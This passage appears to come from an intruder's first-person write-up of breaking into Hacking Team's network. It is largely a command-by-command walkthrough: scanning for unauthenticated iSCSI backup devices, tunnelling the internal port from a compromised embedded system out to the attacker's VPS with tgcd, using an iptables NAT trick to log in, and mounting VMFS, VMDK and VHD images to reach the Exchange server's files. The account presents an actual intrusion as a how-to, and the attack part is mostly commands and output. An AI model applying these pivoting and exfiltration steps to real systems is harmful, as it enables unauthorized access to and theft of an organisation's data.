Crossed Cables
Although it was fun to listen to recordings and see webcam images of Hacking Team developing their malware, it wasn't very useful. Their insecure backups were the vulnerability that opened their doors. According to their documentation [1], their iSCSI devices were supposed to be on a separate network, but nmap found a few in their subnetwork 192.168.1.200/24:
Nmap scan report for ht-synology.hackingteam.local (192.168.200.66) ... 3260/tcp open iscsi? | iscsi-info: | Target: iqn.2000-01.com.synology:ht-synology.name | Address: 192.168.200.66:3260,0 |_ Authentication: No authentication required
Nmap scan report for synology-backup.hackingteam.local (192.168.200.72) ... 3260/tcp open iscsi? | iscsi-info: | Target: iqn.2000-01.com.synology:synology-backup.name | Address: 10.0.1.72:3260,0 | Address: 192.168.200.72:3260,0 |_ Authentication: No authentication required
iSCSI needs a kernel module, and it would've been difficult to compile it for the embedded system. I forwarded the port so that I could mount it from a VPS:
VPS: tgcd -L -p 3260 -q 42838 Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1
Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it because it thinks its IP is 192.168.200.72 instead of 127.0.0.1
The way I solved it was: iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1
And now, after: iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login
...the device file appears! We mount it: vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
and find backups of various virtual machines. The Exchange server seemed like the most interesting. It was too big too download, but it was possible to mount it remotely to look for interesting files: $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk $ fdisk -l /dev/loop0 /dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
so the offset is 2048 * 512 = 1048576 $ losetup -o 1048576 /dev/loop1 /dev/loop0 $ mount -o ro /dev/loop1 /mnt/exchange/
now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311 we find the hard disk of the VM, and mount it: vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/ mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
...and finally we've unpacked the Russian doll and can see all the files from the old Exchange server in /mnt/part1